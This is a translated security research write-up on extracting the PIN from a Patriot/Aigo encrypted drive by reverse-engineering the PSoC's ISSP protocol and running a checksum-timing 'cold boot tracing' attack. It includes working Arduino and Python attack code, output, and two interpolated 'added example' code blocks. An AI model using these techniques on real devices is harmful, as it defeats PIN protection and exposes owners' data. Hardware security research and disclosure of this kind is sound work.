This is the second and final part of the article on reverse-engineering external encrypted drives. As a reminder: a colleague recently brought me a Patriot (Aigo) SK8671 hard drive, I decided to reverse-engineer it, and now I am sharing the results. Before reading further, make sure you have read
4. We start by taking a dump of the PSoC's internal flash
So everything indicates (as we established in [part one]()) that the PIN code is stored in the PSoC's flash memory. Therefore we need to read that flash. The work ahead:
- take control of "communication" with the microcontroller;
- find a way to check whether this "communication" is protected against reading from the outside;
- find a way to bypass the protection.
There are two places where it makes sense to look for the working PIN code:
- the internal flash memory;
- SRAM, where the PIN code may be kept in order to compare it with the PIN code entered by the user.
Looking ahead, I will say that I did manage to get a dump of the PSoC's internal flash, bypassing its protection with a hardware attack called "cold boot tracing", after reverse-engineering the undocumented ISSP protocol. That let me dump the PIN code directly.
$ ./psoc.py
syncing: KO OK
[...]
PIN: 1 2 3 4 5 6 7 8 9
Final program code:
5. ISSP protocol
5.1. What is ISSP
"Communication" with a microcontroller can mean different things, varying from one vendor to the next, but typically it is an exchange over a serial protocol (for example, ICSP for Microchip's PIC).
Cypress has its own proprietary protocol for this, called ISSP (In-System Serial Programming protocol), which is only partly described in
In short, the protocol works like this:
- reset the PSoC;
- output a magic number on the PSoC's serial data pin to enter external programming mode;
- send commands, which are long bit strings called "vectors".
The ISSP documentation describes these vectors for a fairly small set of commands:
- Initialize-1
- Initialize-2
- Initialize-3 (3V and 5V options)
- ID-SETUP
- READ-ID-WORD
- SET-BLOCK-NUM: 10011111010dddddddd111, where dddddddd = block #
- BULK ERASE
- PROGRAM-BLOCK
- VERIFY-SETUP
- READ-BYTE: 10110aaaaaaZDDDDDDDDZ1, where DDDDDDDD = data out, aaaaaa = address (6 bits)
- WRITE-BYTE: 10010aaaaaadddddddd111, where dddddddd = data in, aaaaaa = address (6 bits)
- SECURE
- CHECKSUM-SETUP
- READ-CHECKSUM: 10111111001ZDDDDDDDDZ1 10111111000ZDDDDDDDDZ1, where the two DDDDDDDD fields = data out: the 16-bit device checksum
- ERASE BLOCK
For example, the Initialize-2 vector:
1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111
All vectors have the same length: 22 bits. The HSSP documentation gives a little more information about ISSP: "An ISSP vector is nothing more than a bit sequence representing a set of instructions."
5.2. Demystifying vectors
Let's work out what is going on here. At first I assumed these vectors were simply raw M8C instructions, but after checking that hypothesis I found that the opcodes did not match.
Then I googled the vector above and found
From there I was able to pick up some more useful information from the Supervisory ROM (SROM) section:
- 00h:SWBootReset
- 01h: ReadBlock
- 02h: WriteBlock
- 03h: EraseBlock
- 06h: TableRead
- 07h: CheckSum
- 08h: Calibrate0
- 09h: Calibrate1
By matching the vector names to the SROM functions, we can map the various operations the protocol supports onto the SROM parameters they expect. Thanks to that we can decode the first three bits of an ISSP vector:
- 100 => "wrmem"
- 101 => "rdmem"
- 110 => "wrreg"
- 111 => "rdreg"
However, a complete understanding of what happens on the chip can only be gained by talking to the PSoC directly.
5.3. Communicating with the PSoC
Since Dirk Petrautsky had already
Note that in the course of my research I modified Dirk's code slightly. You can find my changes on GitHub:
So, using an Arduino, I started by using only the "official" vectors for "communication". I tried to read the internal ROM with the VERIFY command. As expected, I could not, most likely because the read-protection bits are set in the flash.
Then I put together a few simple vectors of my own for writing and reading memory and registers. Note that we can read the whole SROM even though the flash is protected!
5.4. Identifying the on-chip registers
After studying the "disassembled" vectors, I found that the device uses undocumented registers (0xF8-0xFA) to specify M8C opcodes that are executed directly, bypassing the protection. This let me run various opcodes such as ADD, MOV A,X, PUSH or JMP. Using them (and watching their side effects on the registers) I was able to determine which of the undocumented registers were really the ordinary registers (A, X, SP and PC).
As a result, the "disassembled" code produced by the HSSP_disas.rb tool looks like this (I added the comments for clarity):
--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00 # reset flags
[DE C0 1C] wrreg SP (f6), 0x00 # reset SP
[9F 07 5C] wrmem KEY1, 0x3A # required argument for SSC
[9F 20 7C] wrmem KEY2, 0x03 # likewise
[DE A0 1C] wrreg PCh (f5), 0x00 # reset PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03 # (LSB) ... to 3 ??
[9F 70 1C] wrmem POINTER, 0x80 # RAM pointer for the output data
[DF 26 1C] wrreg opc1 (f9), 0x30 # Opcode 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40 # Opcode 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01 # BLOCK ID for the SSC call
[DE 00 DC] wrreg A (f0), 0x06 # "Syscall" number: TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00 # Opcode for SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12 # Undocumented operation: execute external opcode
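The vector layouts of 5.1, the three-bit opcode decoding of 5.2 and the register names of 5.4 are enough to rebuild a small encoder and disassembler for 22-bit ISSP vectors. The Python below is an added example; it is neither the page's psoc.py nor Dirk's HSSP_disas.rb. It assumes, from the listings above, that every write vector is opcode(3) | address(8) | data(8) | 111 and every read vector is opcode(3) | address(8) | Z | 8 device-driven bits | Z | 1, and it uses only the SRAM and register names the page itself identified (A = 0xF0, X = 0xF3 from section 6, KEY1/KEY2/BLOCKID/POINTER from the listing). Fed the Initialize-2 bit strings, it reproduces the instructions of the init2 listing above.

```python
# ISSP vector encoder/disassembler. Added example, not the page's tooling.
# Assumed layout (taken from the page's own listings, 22 bits per vector):
#   write: opcode(3) | address(8) | data(8) | "111"
#   read : opcode(3) | address(8) | Z | 8 bits driven by the PSoC | Z | 1

OPCODES = {0b100: "wrmem", 0b101: "rdmem", 0b110: "wrreg", 0b111: "rdreg"}
OPCODE_BITS = {name: code for code, name in OPCODES.items()}

# SRAM addresses named in the page's disassembly (wrmem/rdmem targets)
MEM_NAMES = {0xF8: "KEY1", 0xF9: "KEY2", 0xFA: "BLOCKID", 0xFB: "POINTER"}
# register-space addresses identified in sections 5.4 and 6 (wrreg/rdreg targets)
REG_NAMES = {0xF0: "A", 0xF3: "X", 0xF4: "PCl", 0xF5: "PCh", 0xF6: "SP",
             0xF7: "CPU_F", 0xF8: "opc0", 0xF9: "opc1", 0xFA: "opc2",
             0xFF: "CPU_SCR0"}

# The Initialize-2 vector exactly as the page lists it, one 22-bit vector each
INIT2_VECTORS = """
1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111
""".split()


def encode(op, addr, data=None):
    """Build one 22-bit vector. Read vectors keep the Z/D placeholders where
    the target drives the line, the way the ISSP docs write READ-BYTE."""
    bits = format(OPCODE_BITS[op], "03b") + format(addr & 0xFF, "08b")
    if op.startswith("wr"):
        if data is None:
            raise ValueError("write vector needs data")
        return bits + format(data & 0xFF, "08b") + "111"
    return bits + "Z" + "D" * 8 + "Z1"


def hex_bytes(bits):
    """Render a write vector as HSSP_disas.rb does: 22 bits padded to 3 bytes."""
    padded = bits + "00"
    return " ".join("%02X" % int(padded[i:i + 8], 2) for i in (0, 8, 16))


def disassemble(bits):
    """One 22-bit vector -> one listing line in the page's format."""
    bits = bits.strip()
    if len(bits) != 22:
        raise ValueError("ISSP vectors are 22 bits, got %d" % len(bits))
    op = OPCODES[int(bits[:3], 2)]
    addr = int(bits[3:11], 2)
    if op.startswith("wr"):
        if bits[19:] != "111":
            raise ValueError("write vector must end in 111")
        data = int(bits[11:19], 2)
        if op == "wrreg":
            name = REG_NAMES.get(addr)
            target = "%s (%02x)" % (name, addr) if name else "0x%02X" % addr
        else:
            target = MEM_NAMES.get(addr, "0x%02X" % addr)
        return "[%s] %s %s, 0x%02X" % (hex_bytes(bits), op, target, data)
    # read vector: the host drives 11 bits, the PSoC answers inside the Z..Z window
    if bits[21] != "1":
        raise ValueError("read vector must end in 1")
    window = bits[12:20]
    if set(window) <= {"0", "1"}:          # captured on the wire: decode the data
        return "%s 0x%02X -> 0x%02X" % (op, addr, int(window, 2))
    return "%s 0x%02X -> 8 bits from device" % (op, addr)


def disassemble_all(vectors):
    return [disassemble(v) for v in vectors]


if __name__ == "__main__":
    print("--== init2 ==--")
    for line in disassemble_all(INIT2_VECTORS):
        print(line)
    # The documented SET-BLOCK-NUM is just a wrmem to BLOCKID (0xFA), and
    # READ-BYTE is an rdmem from 0x80 + a, i.e. from where POINTER points.
    print(encode("wrmem", 0xFA, 0x01))
    print(encode("rdmem", 0x80 | 0x05))
```

Two things fall out of the decoder that the documented list does not say outright: SET-BLOCK-NUM (10011111010dddddddd111) is simply a wrmem to BLOCKID at 0xFA, and READ-BYTE (10110aaaaaa...) is an rdmem from 0x80 + a, the SRAM window that POINTER is set to in every vector above. The layout assumption is checked by the tail bits; anything that is not 22 bits, or a write that does not end in 111, is rejected rather than guessed at.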
5.5. Security bits
At this point I could already communicate with the PSoC, but I still had no reliable information about the flash security bits. I was quite surprised that Cypress gives the device's user no way at all to check whether the protection is enabled. I dug deep into Google and finally realised that the HSSP code published by Cypress had been updated after Dirk released his version. And there it was: a new vector had appeared:
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00 # unknown arguments
[9F E0 1C] wrmem 0xFF, 0x00 # likewise
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10 # undocumented syscall!
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12
Using this vector (see read_security_data in psoc.py), we get all the security bits in SRAM at 0x80, two bits per protected block.
The result is discouraging: everything is protected in "disable external read and write" mode. So not only can we not read anything from the flash, we cannot write anything to it either (for example, to plant a ROM dumper there). And the only way to disable the protection is to erase the entire chip. :(
6. First (failed) attack: ROMX
Still, we can try the following trick: since we can execute arbitrary opcodes, why not execute ROMX, the instruction used to read flash memory? This approach has a good chance of succeeding, because the SROM's ReadBlock function (the one the vectors use to read data) checks whether it is being called from ISSP, whereas the ROMX opcode probably has no such check. So here is the Python code (after adding a few helper classes to the Arduino code):
for i in range(0, 8192):                 # walk the whole flash
    write_reg(0xF0, i>>8)                # A = high byte of the address
    write_reg(0xF3, i&0xFF)              # X = low byte of the address
    exec_opcodes("\x28\x30\x40")         # ROMX, HALT, NOP
    byte = read_reg(0xF0)                # ROMX reads ROM[A|X] into A
    print "%02x" % ord(byte[0])          # print the ROM byte
Unfortunately, this code does not work. :( Or rather, it works, but what comes out is our own opcodes (0x28 0x30 0x40)! I don't think this is a read-protection feature of the device. It looks more like an engineering trick: while external opcodes are being executed, the ROM bus is redirected to a temporary buffer.
7. Second attack: cold boot tracing
Since the ROMX trick did not work, I started thinking about another variant of the same trick, described in the publication
7.1. Implementation
The ISSP documentation gives the following vector for CHECKSUM-SETUP:
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12
This essentially calls SROM function 0x07, as described in the documentation (italics mine):
This function performs a checksum verification. It computes a 16-bit checksum over the number of blocks specified by the user in a single flash bank, starting from zero. The BLOCKID parameter is used to pass the number of blocks to include in the checksum computation. A value of "1" computes the checksum of block zero only, while "0" causes the checksum of all 256 blocks of the flash bank to be computed. The 16-bit checksum is returned via KEY1 and KEY2. The KEY1 parameter holds the lower-order 8 bits of the checksum and the KEY2 parameter holds the higher-order 8 bits. For devices with several flash banks, the checksum function is called for each bank separately. The bank number it operates on is set through the FLS_PR1 register (by setting the bit in it that corresponds to the target bank).
Note that this is a simple checksum: the bytes are just added one after another; no fancy CRC tricks. Also, knowing that the M8C core has a very small register set, I assumed that while the checksum is being computed, the intermediate value is kept in the same variables that eventually receive the result: KEY1 (0xF8) / KEY2 (0xF9).
So, in outline, my attack looks like this:
- We connect over ISSP.
- We start the checksum computation with the CHECKSUM-SETUP vector.
- We reset the processor after a chosen time T.
- We read the RAM to get the current checksum C.
- Repeat steps 3 and 4, increasing T a little each time.
- We recover the flash data by subtracting the previous checksum C from the current one.
However, there is a problem: the Initialize-1 vector that we have to send after the reset overwrites KEY1 and KEY2:
1100101000000000000000 # Magic that puts the PSoC into programming mode
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A # the checksum is overwritten here
[9F 20 7C] wrmem KEY2, 0x03 # and here
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09 # SROM function 9
[DF 00 1C] wrreg opc0 (f8), 0x00 # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12
This code overwrites our precious checksum by calling Calibrate1 (SROM function 9)... Maybe we could just send the magic number (from the start of the code above) to enter programming mode, and then read the SRAM? And yes, it works! The Arduino code implementing this attack is quite simple:
case Cmnd_STK_START_CSUM:
    // 32-bit delay in microseconds, sent big-endian by the Python side
    checksum_delay = ((uint32_t)getch())<<24;
    checksum_delay |= ((uint32_t)getch())<<16;
    checksum_delay |= ((uint32_t)getch())<<8;
    checksum_delay |= getch();
    // delayMicroseconds() is only accurate up to 16383 us, so split a long
    // delay into whole milliseconds plus a sub-millisecond remainder
    if(checksum_delay > 10000) {
        ms_delay = checksum_delay/1000;
        checksum_delay = checksum_delay%1000;
    }
    else {
        ms_delay = 0;
    }
    send_checksum_v();                    // start the SROM CheckSum computation
    if(checksum_delay)                    // delayMicroseconds(0) misbehaves: skip it
        delayMicroseconds(checksum_delay);
    delay(ms_delay);
    start_pmode();                        // reset the PSoC into programming mode (magic number only)
What this does:
- Read checksum_delay.
- Run the checksum computation (send_checksum_v).
- Wait the requested time, keeping two pitfalls in mind:
  - I lost a lot of time before I figured out that delayMicroseconds only works correctly for delays of up to 16383 µs;
  - and then I lost just as much time again before I discovered that delayMicroseconds, when passed 0, misbehaves completely!
- Reset the PSoC into programming mode (we only send the magic number, without sending the init vectors).
The final code in Python:
import os, struct, serial                         # pyserial for the Arduino link

for delay in range(0, 150000):                    # delay in microseconds
    for i in range(0, 10):                        # number of reads for each delay
        try:
            reset_psoc(quiet=True)                # reset and enter programming mode
            send_vectors()                        # send the initialisation vectors
            ser.write("\x85"+struct.pack(">I", delay))  # compute the checksum + reset after the delay
            res = ser.read(1)                     # read the Arduino ACK
        except Exception as e:
            print e
            ser.close()
            os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
            ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5)  # reopen the serial port
            continue
        print "%05d %02X %02X %02X" % (delay,     # read the RAM bytes
                                       read_regb(0xf1),
                                       read_ramb(0xf8),
                                       read_ramb(0xf9))
In short, this code:
- resets the PSoC (and sends the magic number);
- sends the full set of initialisation vectors;
- calls the Arduino's Cmnd_STK_START_CSUM function (0x85), passing the delay in microseconds as a parameter;
- reads the checksum (0xF8 and 0xF9) and the undocumented register 0xF1.
This is run 10 times for each 1 µs step of the delay. 0xF1 is included because it is the only register that changed during the checksum computation; it is probably some kind of temporary used by the arithmetic logic unit. Note the ugly hack I use to reset the Arduino with picocom whenever the Arduino stops showing signs of life (no idea why).
7.2. Reading the results
The output of the Python script looks like this (simplified for readability):
DELAY F1 F8 F9 # F1 = the unknown register mentioned above
               # F8 = low byte of the checksum
               # F9 = high byte of the checksum
00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00 # the checksum is reset to 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00 # 1st byte: 0x0080-0x0000 = 0x80
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00 # 2nd byte: 0xE7-0x80 = 0x67
00057 CC E7 00
00057 01 17 01 # no idea what is going on here
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00 # E7 again?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00 # Hmmmmm
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01 # Ah, got it! That is the carry into the high byte
00063 01 17 01
[...]
00075 CC 17 01 # so, 0x117-0xE7 = 0x30
That said, we have a problem: since we are dealing with a plain additive checksum, a null byte does not change the value. However, since the whole computation (8192 bytes) takes 0.1478 seconds (with small variations from run to run), which works out to about 18.04 µs per byte, we can use this timing to sample the checksum value at the right moments. For the first runs everything is easy to read, since the computation's timing stays almost the same. The end of this dump, however, is far less clean, because the "small timing deviations" of the individual runs accumulate into something significant:
134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DD
That is garbage, with ten reads at every microsecond of delay. The total running time to dump the whole flash comes to about 48 hours.
7.3. Flash binary reconstruction
I have not yet finished writing the code that will fully reconstruct the flash program code, taking all the timing deviations into account. However, I have already recovered the beginning of the code. To make sure I did it correctly, I disassembled it with m8cdis:
0000: 80 67 jmp 0068h ; Reset vector
[...]
0068: 71 10 or F,010h
006a: 62 e3 87 mov reg[VLT_CR],087h
006d: 70 ef and F,0efh
006f: 41 fe fb and reg[CPU_SCR1],0fbh
0072: 50 80 mov A,080h
0074: 4e swap A,SP
0075: 55 fa 01 mov [0fah],001h
0078: 4f mov X,SP
0079: 5b mov A,X
007a: 01 03 add A,003h
007c: 53 f9 mov [0f9h],A
007e: 55 f8 3a mov [0f8h],03ah
0081: 50 06 mov A,006h
0083: 00 ssc
[...]
0122: 18 pop A
0123: 71 10 or F,010h
0125: 43 e3 10 or reg[VLT_CR],010h
0128: 70 00 and F,000h ; Paging mode changed from 3 to 0
012a: ef 62 jacc 008dh
012c: e0 00 jacc 012dh
012e: 71 10 or F,010h
0130: 62 e0 02 mov reg[OSC_CR0],002h
0133: 70 ef and F,0efh
0135: 62 e2 00 mov reg[INT_VC],000h
0138: 7c 19 30 lcall 1930h
013b: 8f ff jmp 013bh
013d: 50 08 mov A,008h
013f: 7f ret
Looks plausible!
7.4. Finding the PIN code storage address
Now that we can read the checksum at any moment we choose, we can easily check what changes, and where, when we:
- enter a wrong PIN code;
- change the PIN code.
First, to find the storage address, I took a checksum dump in 10 ms increments after reset. Then I entered a wrong PIN and did the same.
The result was not very pleasant, since there were a lot of changes. But in the end I was able to determine that the checksum changed somewhere between 120000 µs and 140000 µs of delay. But the "PIN code" I displayed there was completely wrong, owing to an artefact of the delayMicroseconds function, which does strange things when passed 0.
Then, after spending about three hours on this, I remembered that the SROM CheckSum system call takes an argument specifying the number of blocks to checksum! So we can easily locate the storage address of the PIN code and the "wrong attempts" counter, down to a single 64-byte block.
My first run gave the following:
Then I changed the PIN code from "123456" to "1234567" and got:
So the PIN code and the wrong-attempt counter appear to be stored in block number 126.
7.5. Dumping block #126
Block #126 should be found somewhere around 125x64x18 = 144000 µs from the start of the checksum computation in my full dump, and that looks plausible. Then, after manually filtering out a lot of invalid values (due to the accumulation of "small timing deviations"), I ended up with these bytes (at a latency of 145527 µs):
Obviously the PIN code is stored in unencrypted form! These values are of course not ASCII codes, but as it turns out they are readings taken from the capacitive keyboard.
Finally, I ran a few more tests to find where the wrong-attempt counter is stored. Here is the result:
0xFF means "15 attempts" and is decremented with each failed attempt.
7.6. PIN code recovery
Here is my ugly code that puts all of the above together:
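The procedure of 7.1, the timing-drift problem of 7.2 and the BLOCKID localisation trick of 7.4 can all be exercised offline against a simulated chip. The Python below is an added example and not the page's psoc.py: SimulatedPSoC stands in for the PSoC and its SROM CheckSum routine, and the figures it uses are the page's own (18.04 µs per byte, 64-byte blocks, 8 KB of flash, the PIN's keyboard codes in block 126, the dump_pin code table), while the counter's offset inside the block and the 0.05% per-run timing drift are assumptions of the example. It first finds the changed block from final checksums alone (no timing needed), then traces block 126 byte by byte with a majority vote over ten resets, and finally shows why the same fixed-slot sampling that is exact early in the flash falls apart at block 126 once the drift has accumulated.

```python
# Offline model of cold boot tracing (added example; the chip is simulated).
# Assumed: counter offset inside the PIN block, and the drift magnitude.
import random

US_PER_BYTE = 18.04      # 0.1478 s / 8192 bytes, as measured on the page
BLOCK_SIZE = 64          # block #126 ~ 125*64*18 us (section 7.5)
FLASH_SIZE = 8192
PIN_BLOCK = 126
COUNTER_OFFSET = 16      # assumed position of the attempt counter in the block
# capacitive-keyboard codes for the digits 0-9, from the page's dump_pin table
KEY_CODES = {0x24: "0", 0x25: "1", 0x26: "2", 0x27: "3", 0x20: "4",
             0x21: "5", 0x22: "6", 0x23: "7", 0x2C: "8", 0x2D: "9"}
CODE_OF_DIGIT = {d: c for c, d in KEY_CODES.items()}


class SimulatedPSoC:
    """Stand-in for the chip, not a model of the real SROM. CheckSum sums the
    first BLOCKID blocks (BLOCKID=0: the whole flash) one byte every
    US_PER_BYTE into 16-bit KEY2:KEY1; `drift` is the per-run timing
    deviation of section 7.2, as a fraction of the nominal byte time."""

    def __init__(self, flash, drift=0.0, seed=1):
        self.flash = bytes(flash)
        self.drift = drift
        self.rng = random.Random(seed)

    def _nbytes(self, blockid):
        nblocks = len(self.flash) // BLOCK_SIZE if blockid == 0 else blockid
        return nblocks * BLOCK_SIZE

    def checksum(self, blockid=0):
        """Final value, read back once the SROM call has completed."""
        return sum(self.flash[:self._nbytes(blockid)]) & 0xFFFF

    def csum_at(self, delay_us, blockid=0):
        """Value left in KEY1/KEY2 when the core is reset delay_us into the call."""
        per_byte = US_PER_BYTE * (1.0 + self.rng.uniform(-self.drift, self.drift))
        done = min(self._nbytes(blockid), int(delay_us / per_byte))
        return sum(self.flash[:done]) & 0xFFFF


def changed_blocks(before, after):
    """7.4 trick: final checksums of the first n blocks (n = 1..N) in two
    device states; block n-1 changed if the n-th cumulative step differs.
    A change that keeps a block's byte sum (two digits swapped) is invisible."""
    nblocks = len(before.flash) // BLOCK_SIZE
    changed, prev_b, prev_a = [], 0, 0
    for n in range(1, nblocks + 1):
        cb, ca = before.checksum(n), after.checksum(n)
        if (cb - prev_b) & 0xFFFF != (ca - prev_a) & 0xFFFF:
            changed.append(n - 1)
        prev_b, prev_a = cb, ca
    return changed


def trace_block(target, block, reads=10):
    """7.1 loop for one block: reset once per byte slot, vote over `reads`
    resets, take each byte as the 8-bit step between neighbouring sums. The
    16-bit subtraction absorbs the carry into KEY2, and a 0x00 byte is just a
    zero step, so nulls are harmless once the slot boundaries are known."""
    first = block * BLOCK_SIZE
    sums = []
    for k in range(BLOCK_SIZE + 1):
        delay = (first + k + 0.5) * US_PER_BYTE        # middle of the k-th slot
        samples = [target.csum_at(delay) for _ in range(reads)]
        sums.append(max(set(samples), key=samples.count))
    return bytes((sums[k + 1] - sums[k]) & 0xFF for k in range(BLOCK_SIZE))


def accuracy(recovered, truth):
    """Fraction of bytes recovered correctly."""
    return sum(a == b for a, b in zip(recovered, truth)) / float(len(truth))


def decode_pin(block_bytes):
    """Keyboard codes back to digits; every other byte is skipped."""
    return "".join(KEY_CODES[b] for b in block_bytes if b in KEY_CODES)


def block_of(flash, block):
    return flash[block * BLOCK_SIZE:(block + 1) * BLOCK_SIZE]


def make_flash(pin, tries_left=0xFF, seed=7):
    """Constructed 8 KB image: pseudo-random firmware, then the PIN's key codes
    and the attempt counter in block PIN_BLOCK (the layout the page observed)."""
    rng = random.Random(seed)
    flash = bytearray(rng.randrange(256) for _ in range(FLASH_SIZE))
    block = bytearray(BLOCK_SIZE)
    block[:len(pin)] = bytes(CODE_OF_DIGIT[d] for d in pin)
    block[COUNTER_OFFSET] = tries_left
    flash[PIN_BLOCK * BLOCK_SIZE:(PIN_BLOCK + 1) * BLOCK_SIZE] = block
    return bytes(flash)


if __name__ == "__main__":
    good = SimulatedPSoC(make_flash("123456"))
    one_failure = SimulatedPSoC(make_flash("123456", tries_left=0xFE))
    print("block(s) changed by a failed attempt:", changed_blocks(good, one_failure))
    exact = SimulatedPSoC(make_flash("123456789"))
    print("PIN:", decode_pin(trace_block(exact, PIN_BLOCK)))
    noisy = SimulatedPSoC(make_flash("123456789"), drift=0.0005)
    for blk in (2, PIN_BLOCK):
        acc = accuracy(trace_block(noisy, blk), block_of(noisy.flash, blk))
        print("with drift, block %3d recovered at %.0f%%" % (blk, 100 * acc))
```

With a 0.05% per-run drift the sampling error at block 2 is about a tenth of a byte time, so the majority vote lands on the right sum every time; at block 126 the same drift has grown to roughly four byte times, the ten samples scatter over neighbouring sums, and the vote no longer converges. That is the accumulation the page describes in 7.2, and it is why tighter timing (FPGA or hardware timers, as suggested in section 8) matters more than more reads per delay.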
def dump_pin():
    # keyboard scan codes observed in the block #126 dump, mapped to digits
    pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
               0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
    last_csum = 0
    pin_bytes = []
    # one reset per byte slot of block #126; csum_at (from psoc.py) returns the
    # 16-bit checksum left in KEY1/KEY2 after resetting the PSoC `delay` us in
    for delay in range(145495, 145719, 16):
        csum = csum_at(delay, 1)
        byte = (csum-last_csum)&0xFF          # each byte is the step between neighbouring sums
        print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
        pin_bytes.append(byte)
        last_csum = csum
    print "PIN: ",
    for i in range(0, len(pin_bytes)):
        if pin_bytes[i] in pin_map:
            print pin_map[pin_bytes[i]],
    print
Here is the result of running it:
$ ./psoc.py
syncing: KO OK
Resetting PSoC: KO Resetting PSoC: KO Resetting PSoC: OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN: 1 2 3 4 5 6 7 8 9
Hooray! Works!
Note that the latency values I used are probably specific to the particular PSoC I worked with.
8. What's next?
So, to summarise the PSoC side, in the context of our Aigo drive:
- we can read the SRAM even when the flash is read-protected;
- we can bypass the anti-brute-force protection by using a cold boot trace attack and reading the PIN code directly.
However, our attack has some flaws due to the synchronisation problems. It could be improved as follows:
- write a utility to properly decode the data obtained from the "cold boot trace" attack;
- use an FPGA-based gadget to generate precise time delays (or use the Arduino's hardware timers);
- try another attack: deliberately enter a PIN code, reset, and dump the RAM, hoping that the real PIN code is kept in RAM for the comparison. However, this is not easy to do with an Arduino, since the Arduino's signal level is 5 volts while the board under examination works with 3.3-volt signals.
Another interesting thing to try is playing with the voltage level to bypass the read protection. If that approach worked, we could get exact data from the flash instead of relying on reading the checksum with finicky time delays.
Since the SROM probably reads the guard bits via the ReadBlock system call, we could do the same
Another interesting thing to do would be to squeeze more out of the chip: take an SRAM dump, look for undocumented system calls and vulnerabilities.
9. Conclusion
So the security of this drive leaves a lot to be desired, since it uses an ordinary (not "hardened") microcontroller to store the PIN code... Moreover, I have not yet checked how things stand with data encryption on this device!
What would I recommend to Aigo? After analysing several models of encrypted HDD drives, in 2015 I made
I spent two weekends and a few evenings on this research, about 40 hours in total, counting from the start (when I opened the disk) to the end (the PIN code dump). Those same 40 hours include the time I spent writing this article. It was a very enjoyable journey.
Source: www.habr.com